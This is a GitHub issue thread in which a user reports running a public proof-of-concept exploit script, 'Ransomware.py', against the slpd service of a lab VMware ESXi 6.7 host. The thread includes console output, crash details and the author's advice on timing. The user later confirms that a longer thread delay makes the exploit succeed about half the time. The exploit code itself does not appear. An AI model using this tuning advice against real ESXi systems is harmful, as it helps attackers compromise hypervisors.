Closed taladrovs1 closed 3 years ago
Hi,
It looks like the threading is running out of sync. I am not sure why, but this could be because the time your slpd responds back to the client is a bit late. Try increasing the sleeping time to see if you get better results.
On Thu, Aug 12, 2021 at 9:49 AM taladrovs1 @.***> wrote:
Hi Straighblast, great work! I made a lab to test this exploit.
I have an ESXi 6.7 (just donwloaded from official website): @.:] vmware -vl VMware ESXi 6.7.0 build-14320388 VMware ESXi 6.7.0 Update 3 @.:]
Validate slpd is running: @.:] /etc/init.d/slpd status slpd is running @.:]
All the settings on ESXi are by default (only enabled SSH).
I test your script but I got this:
┌──(root💀kali)-[/] └─# python3 Ransomware.py 192.168.0.104 1
/ \ \ / / || ) ) || ) / _ | | | | (_ \ V /| *|/ / () / /| |/ /| , / / /| | | / || //*|| /||// // ||
PoC Exploit
vuln discovered by: Lucas Leong (@wmliang)
poc by: Johnny Yu ***@***.***_blast) currently support the following: [1] VMware ESXi 6.7.0 build-14320388 [2] VMware ESXi 6.7.0 build-16316930
[SLP Client-1] connect [SLP Client-1] directory agent advertisement [SLP Client-2] connect [SLP Client-3] connect [SLP Client-4] connect [SLP Client-5] connect [SLP Client-2] service request [SLP Client-3] service request [SLP Client-4] service request [SLP Client-5] service request [SLP Client-6] connect [SLP Client-6] service request [SLP Client-7] connect [SLP Client-8] connect [SLP Client-9] connect [SLP Client-9] directory agent advertisement [SLP Client-8] service request [SLP Client-1] recv: b'' [SLP Client-3] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-2] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-6] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-6] close [SLP Client-8] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-4] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-5] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-9] recv: b'' [SLP Client-7] service registration [SLP Client-7] recv: b'' [SLP Client-8] service request [SLP Client-8] recv: b'' [SLP Client-10] connect Exception in thread Thread-10: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-11] connect Exception in thread Thread-11: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-12] connect Exception in thread Thread-12: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-13] connect Exception in thread Thread-13: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-14] connect Exception in thread Thread-14: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-15] connect Exception in thread Thread-15: Traceback (most recent call last):
After that the SLPd crashed: @.:] /etc/init.d/slpd status slpd is not running @.:]
So I have to restart the SLP deamon to test again the exploit but I got the same error.
Where I can get some logs to find the error? I'm new doing this kind of test and maybe there is an dummie error I've been made. Thanks for your time.
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/straightblast/My-PoC-Exploits/issues/4, or unsubscribe https://github.com/notifications/unsubscribe-auth/AGBX6EAW5OB53GGEOUGNRQLT4P3P5ANCNFSM5CBVCPRQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&utm_campaign=notification-email .
Hi Straightblast, I put 2 seconds on T as @tijldeneut said and worked fine. I was able to get it to work 5 out of 10 tries. Again thanks for the post and the exploit.
Hi Straighblast, great work! I made a lab to test this exploit.
I have an ESXi 6.7 (just donwloaded from official website): [root@localhost:~] vmware -vl VMware ESXi 6.7.0 build-14320388 VMware ESXi 6.7.0 Update 3 [root@localhost:~]
Validate slpd is running: [root@localhost:~] /etc/init.d/slpd status slpd is running [root@localhost:~]
All the settings on ESXi are by default (only enabled SSH).
I test your script but I got this:
┌──(root💀kali)-[/] └─# python3 Ransomware.py 192.168.0.104 1
/ \ \ / / || ) _ ) || ) / __ | | |
| ( \ V /| |/ / () / /| |_/ /| _, / / /| |
_| _/ |__| /__/_|| /||// // ||
[SLP Client-1] connect [SLP Client-1] directory agent advertisement [SLP Client-2] connect [SLP Client-3] connect [SLP Client-4] connect [SLP Client-5] connect [SLP Client-2] service request [SLP Client-3] service request [SLP Client-4] service request [SLP Client-5] service request [SLP Client-6] connect [SLP Client-6] service request [SLP Client-7] connect [SLP Client-8] connect [SLP Client-9] connect [SLP Client-9] directory agent advertisement [SLP Client-8] service request [SLP Client-1] recv: b'' [SLP Client-3] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-2] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-6] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-6] close [SLP Client-8] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-4] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-5] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00' [SLP Client-9] recv: b'' [SLP Client-7] service registration [SLP Client-7] recv: b'' [SLP Client-8] service request [SLP Client-8] recv: b'' [SLP Client-10] connect Exception in thread Thread-10: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-11] connect Exception in thread Thread-11: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-12] connect Exception in thread Thread-12: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-13] connect Exception in thread Thread-13: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-14] connect Exception in thread Thread-14: Traceback (most recent call last): File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner self.run() File "Ransomware.py", line 56, in run s.connect((IP, PORT)) ConnectionRefusedError: [Errno 111] Connection refused [SLP Client-15] connect Exception in thread Thread-15: Traceback (most recent call last):
After that the SLPd crashed: [root@localhost:~] /etc/init.d/slpd status slpd is not running [root@localhost:~]
So I have to restart the SLP deamon to test again the exploit but I got the same error.
Where I can get some logs to find the error? I'm new doing this kind of test and maybe there is an dummie error I've been made. Thanks for your time.